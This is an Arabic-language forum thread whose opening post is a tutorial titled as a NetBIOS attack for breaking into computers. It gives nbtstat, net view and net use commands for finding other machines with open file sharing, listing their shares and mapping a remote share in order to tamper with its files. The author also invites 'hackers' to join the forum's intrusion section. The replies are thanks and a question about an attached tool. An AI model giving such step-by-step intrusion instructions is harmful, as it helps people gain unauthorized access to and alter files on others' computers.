الحالة
موضوع مغلق

brightdark

عضـو
التسجيل
8/7/03
المشاركات
362
الإعجابات
6
#1
'',
موضوع اليوم : الإختراق عن طريق NetBios Attack

أولا : أولا :
لقد ترددت كثيرا قبل الكتابة مرة أخرى في الإختراق ولكن سأترك الموضوع بعض الوقت في منتدى البرامج ثم أرفعه منه ، والغرض من ذلك التعرف هو إكتساب نوعيات محدده من الهاكرز الى منتدى الأختراق لدينا وهو ما سيعلن عنه عن قيرب بإذن الله ..

هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة.
وللتجربة على نفسك كمثال : إحصل على IP الخاص بجهازك بواسطة ذلك البرنامج الصغير المحمل في المرفقات مثلا .
1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).

2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .

3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .

4- سيظهر لك الجدول التالى :
NetBIOS Remote Machine Name Table
_________
Name Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
ملحوظة : تم حذف المعلومات الأصلية من الجدول .

5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه.

6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:
Net view \\<insert ip_address here>

7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk

8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :
Net use x: \\<insert IP address here>\temp

طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق ..

ملحوظة: البرنامج في المرفقات له العديد من المزايا والوظائف سأوردها لك عن قريب بإذن الله ..
مع تحياتي.......
 

بدر الرياض

عضـو
التسجيل
17/8/03
المشاركات
1,819
الإعجابات
7
#2
جزاك الله خير

الف شكر يامبدع
 

shaan

عضـو
التسجيل
20/11/03
المشاركات
51
الإعجابات
0
#3
جزاك الله خير
 

mass2003

عضـو
التسجيل
31/8/03
المشاركات
78
الإعجابات
18
#4
شكراً لك اخي الكريم و جزاك الله خيرا
و كل عام وانت بخير
تقبل خالص تحياتي
 

بن جابر

عضو محترف
التسجيل
22/6/03
المشاركات
477
الإعجابات
2
العمر
39
#5
الله يبارك فيك وجزاك الله خير
 

MrBaZ

عضو فعال
التسجيل
18/7/03
المشاركات
168
الإعجابات
0
#6
شكرا و جزاك الله خير
 

sameh_a1

عضـو
التسجيل
23/3/03
المشاركات
108
الإعجابات
0
#7
رائع وجزاك الله كل خير
 

starlight

عضـو
التسجيل
7/9/03
المشاركات
495
الإعجابات
0
#8
جزاك الله خير
 

Yosef SH

عضو محترف
التسجيل
17/8/03
المشاركات
451
الإعجابات
2
#9
جزاك الله كل خير
 

a_khat

عضو فعال
التسجيل
1/1/04
المشاركات
179
الإعجابات
1
#10
شكرا اخي الكريم
 

2pac

عضو مميز
التسجيل
4/10/03
المشاركات
200
الإعجابات
0
#11
بارك الله فيك اخوي ومنتظرين الدروس القادمة على احر من الجمر

:)
 

جارالقمر

عضو جديد
التسجيل
19/10/03
المشاركات
4
الإعجابات
0
#12
أخوي brightdark
نزلت البرنامج لكن للأسف ماعندي برنامج يفتح الملفات اللي امتدادها rar
ممكن رابط لبرنامج يشغل الملف
وشكرا
 

جارالقمر

عضو جديد
التسجيل
19/10/03
المشاركات
4
الإعجابات
0
#14
مشكور اخوي الساري وماقصرت
 

faisal_am

عضـو
التسجيل
17/2/04
المشاركات
40
الإعجابات
0
#15
جزاك الله خيراّّّ
رحم الله والديك وما قصرت مشكور ياطيب
 

مهون

عضو جديد
التسجيل
22/2/04
المشاركات
10
الإعجابات
1
#16
مشكور اخوي على المعلومات الحلوة
 

alsaquer

عضو مميز
التسجيل
1/11/03
المشاركات
298
الإعجابات
6
#17
'',

ما شاء الله شرح رائع جزاك الله خيراً أخي brightdark
 
الحالة
موضوع مغلق

أعلى